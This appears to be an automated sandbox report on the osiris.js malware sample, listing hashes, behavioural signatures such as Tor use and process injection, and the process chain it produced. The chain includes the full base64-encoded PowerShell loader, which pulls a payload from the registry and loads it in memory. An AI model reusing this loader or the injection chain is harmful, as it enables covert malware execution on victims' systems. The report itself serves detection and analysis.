Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-01-2021 12:26
Static task
static1
Behavioral task
behavioral1
Sample
osiris.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
osiris.js
Resource
win10v20201028
General
-
Target
osiris.js
-
Size
2.5MB
-
MD5
e00ccaf47b31887d18ccc6d80aaa2a39
-
SHA1
60b574bcda0024cf90ec3f7e97db28c58cc79552
-
SHA256
20d1df07b4e17ee0821043733106bd179a520acd9ec307bdb1703df17cbf6ee7
-
SHA512
5c3181b5440ac31079c8651d752ad890d84b5ee692b37168866e8c0bef1abfcc8d77311c5df7a7e0e72ad33c9ab999e4b096a199c832e42778565be2ede9c4c6
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
GetX64BTIT.exepid process 3828 GetX64BTIT.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.ipify.org 18 api.ipify.org -
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2924 set thread context of 3764 2924 powershell.exe ImagingDevices.exe -
Suspicious behavior: EnumeratesProcesses 6969 IoCs
Processes:
powershell.exeImagingDevices.exepid process 2924 powershell.exe 2924 powershell.exe 2924 powershell.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe 3764 ImagingDevices.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2924 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
ImagingDevices.exepid process 3764 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
wscript.execmd.exepowershell.exeImagingDevices.exedescription pid process target process PID 504 wrote to memory of 3704 504 wscript.exe cmd.exe PID 504 wrote to memory of 3704 504 wscript.exe cmd.exe PID 3704 wrote to memory of 2924 3704 cmd.exe powershell.exe PID 3704 wrote to memory of 2924 3704 cmd.exe powershell.exe PID 3704 wrote to memory of 2924 3704 cmd.exe powershell.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 2924 wrote to memory of 3764 2924 powershell.exe ImagingDevices.exe PID 3764 wrote to memory of 3828 3764 ImagingDevices.exe GetX64BTIT.exe PID 3764 wrote to memory of 3828 3764 ImagingDevices.exe GetX64BTIT.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js1⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAegBnAGIAbQBnAHMAdgBpACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "2⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAegBnAGIAbQBnAHMAdgBpACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"5⤵
- Executes dropped EXE
PID:3828
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
efe080540179c771d3f5fb83ed67a6c6
SHA1880d14b09dd8243bce981a589c8d0ba2d5917247
SHA2561f04cc948752ccf1534fe74074d043a9acab0c02802d1ba8d1aa5d562779dc7a
SHA512efac3dfaf3407eaa7604d9ca424f310df103430767e16c91b203d1d3f7a5f31729173d82d709db52f9b12133b16f0b7b2c66344e79c91cde499544c08964e5c1